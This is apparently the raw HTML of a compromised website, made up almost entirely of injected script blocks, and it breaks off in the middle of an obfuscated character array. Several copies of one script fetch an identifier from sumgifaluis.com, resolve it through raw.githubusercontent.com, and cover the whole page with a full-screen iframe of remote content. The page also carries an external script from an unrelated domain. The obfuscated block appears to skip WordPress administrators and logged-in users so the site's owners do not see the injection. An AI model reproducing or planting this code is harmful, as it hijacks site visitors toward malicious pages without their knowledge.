    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script><script async src="https://transporteejecutivovc.com/sttje/"></script></script><script>(function(){var __s=(function(){var _0x5641=[114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,44,59,40,122,27,10,19,5,19,30,5,15,8,22,122,103,122,120,50,46,46,42,41,96,117,117,40,53,41,40,63,60,47,40,56,53,41,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42,120,97,87,80,122,122,44,59,40,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,122,103,122,1,87,80,122,122,122,122,33,122,46,63,55,42,54,59,46,63,96,122,120,50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39,120,118,122,47,41,63,28,63,46,57,50,96,122,46,40,47,63,122,39,87,80,122,122,7,97,87,80,87,80,122,122,44,59,40,122,29,22,21,24,27,22,5,17,31,3,122,103,122,114,46,35,42,63,53,60,122,9,35,55,56,53,54,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,122,124,124,122,9,35,55,56,53,54,116,60,53,40,115,87,80,122,122,122,122,101,122,9,35,55,56,53,54,116,60,53,40,114,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,115,87,80,122,122,122,122,96,122,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,97,87,80,87,80,122,122,44,59,40,122,40,63,61,51,41,46,40,35,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,38,38,122,33,87,80,122,122,122,122,41,46,59,46,47,41,96,122,120,51,62,54,63,120,118,87,80,122,122,122,122,51,60,40,59,55,63,19,62,96,122,120,5,5,51,52,54,51,52,63,5,53,60,60,63,40,5,51,60,40,59,55,63,5,5,120,118,87,80,122,122,122,122,51,60,40,59,55,63,27,46,46,40,96,122,120,62,59,46,59,119,51,52,54,51,52,63,119,53,60,60,63,40,119,60,40,59,55,63,120,118,87,80,122,122,122,122,50,51,52,46,41,96,122,33,39,118,87,80,122,122,122,122,40,47,52,10,40,53,55,51,41,63,96,122,52,47,54,54,118,87,80,122,122,122,122,62,63,41,46,40,53,35,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,44,63,59,54,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,96,122,110,106,106,106,118,87,80,122,122,122,122,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,96,122,99,106,106,106,118,87,80,122,122,122,122,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,96,122,60,59,54,41,63,118,87,80,122,122,122,122,55,63,41,41,59,61,63,24,53,47,52,62,96,122,60,59,54,41,63,87,80,122,122,39,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,51,60,122,114,45,51,52,62,53,45,116,5,5,62,51,41,59,56,54,63,19,52,54,51,52,63,21,60,60,63,40,5,5,122,103,103,103,122,46,40,47,63,122,38,38,122,45,51,52,62,53,45,116,5,5,51,41,13,42,27,62,55,51,52,5,5,122,103,103,103,122,46,40,47,63,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,42,59,46,50,122,103,122,45,51,52,62,53,45,116,54,53,57,59,46,51,53,52,116,42,59,46,50,52,59,55,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,4,6,117,114,45,42,119,59,62,55,51,52,38,45,42,119,54,53,61,51,52,115,117,116,46,63,41,46,114,42,59,46,50,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,57,53,53,49,51,63,122,103,122,62,53,57,47,55,63,52,46,116,57,53,53,49,51,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,45,53,40,62,42,40,63,41,41,5,54,53,61,61,63,62,5,51,52,5,1,4,103,7,112,103,117,116,46,63,41,46,114,57,53,53,49,51,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,62,63,122,103,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,97,87,80,122,122,122,122,122,122,44,59,40,122,56,53,62,35,122,103,122,62,53,57,47,55,63,52,46,116,56,53,62,35,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,63,122,124,124,122,46,35,42,63,53,60,122,62,63,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,45,42,119,46,53,53,54,56,59,40,6,56,117,116,46,63,41,46,114,62,63,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,56,53,62,35,122,124,124,122,46,35,42,63,53,60,122,56,53,62,35,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,59,62,55,51,52,119,56,59,40,6,56,117,116,46,63,41,46,114,56,53,62,35,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,120,45,42,59,62,55,51,52,56,59,40,120,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,59,54,41,63,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,115,122,33,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,54,53,59,62,51,52,61,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,59,57,46,51,44,63,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,62,53,52,63,120,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,54,53,59,62,51,52,61,120,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,49,63,35,118,122,44,59,54,115,122,33,87,80,122,122,122,122,44,59,40,122,41,63,42,122,103,122,47,40,54,116,51,52,62,63,34,21,60,114,120,101,120,115,122,100,103,122,106,122,101,122,120,124,120,122,96,122,120,101,120,97,87,80,122,122,122,122,40,63,46,47,40,52,122,47,40,54,122,113,122,41,63,42,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,49,63,35,115,122,113,122,120,103,120,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,44,59,54,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,46,63,55,42,54,59,46,63,118,122,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,123,46,63,55,42,54,59,46,63,122,38,38,122,123,51,62,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,62,40,53,42,56,53,34,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,51,62,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,51,62,115,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,61,51,41,46,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,62,116,40,63,42,54,59,57,63,114,117,127,104,28,117,61,118,122,120,117,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,63,52,57,53,62,63,62,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,46,53,18,46,46,42,15,40,54,114,44,59,54,47,63,115,122,33,87,80,122,122,122,122,51,60,122,114,123,44,59,54,47,63,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,41,122,103,122,9,46,40,51,52,61,114,44,59,54,47,63,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,87,80,122,122,122,122,122,122,116,46,40,51,55,114,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,1,125,120,58,6,41,7,113,38,1,125,120,58,6,41,7,113,126,117,61,118,122,120,120,115,97,87,80,87,80,122,122,122,122,51,60,122,114,123,41,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,123,117,4,1,59,119,32,7,1,59,119,32,106,119,99,113,116,119,7,112,96,6,117,6,117,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,117,4,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,1,6,117,101,121,7,38,126,115,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,122,122,41,122,103,122,120,50,46,46,42,41,96,117,117,120,122,113,122,41,97,87,80,122,122,122,122,122,122,39,122,63,54,41,63,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,47,122,103,122,52,63,45,122,15,8,22,114,41,115,97,87,80,122,122,122,122,122,122,51,60,122,114,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,96,120,122,38,38,122,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,41,96,120,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,47,116,50,40,63,60,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,118,122,62,63,42,46,50,115,122,33,87,80,122,122,122,122,51,60,122,114,123,51,52,42,47,46,122,38,38,122,62,63,42,46,50,122,100,122,105,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,41,46,40,51,52,61,120,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,53,18,46,46,42,15,40,54,114,51,52,42,47,46,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,46,53,9,46,40,51,52,61,116,57,59,54,54,114,51,52,42,47,46,115,122,103,103,103,122,120,1,53,56,48,63,57,46,122,27,40,40,59,35,7,120,115,122,33,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,51,122,103,122,106,97,122,51,122,102,122,51,52,42,47,46,116,54,63,52,61,46,50,97,122,51,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,59,40,40,12,59,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,51,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,59,40,40,12,59,54,115,122,40,63,46,47,40,52,122,59,40,40,12,59,54,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,53,56,48,63,57,46,120,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,49,63,35,41,122,103,122,1,120,47,40,54,120,118,122,120,54,51,52,49,120,118,122,120,50,40,63,60,120,118,122,120,54,53,57,59,46,51,53,52,120,118,122,120,40,63,62,51,40,63,57,46,120,118,122,120,46,59,40,61,63,46,120,118,122,120,54,59,52,62,51,52,61,120,118,122,120,54,59,52,62,51,52,61,15,40,54,120,7,97,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,48,122,103,122,106,97,122,48,122,102,122,49,63,35,41,116,54,63,52,61,46,50,97,122,48,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,49,63,35,122,103,122,49,63,35,41,1,48,7,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,63,35,115,115,122,33,87,80,122,122,122,122,122,122,12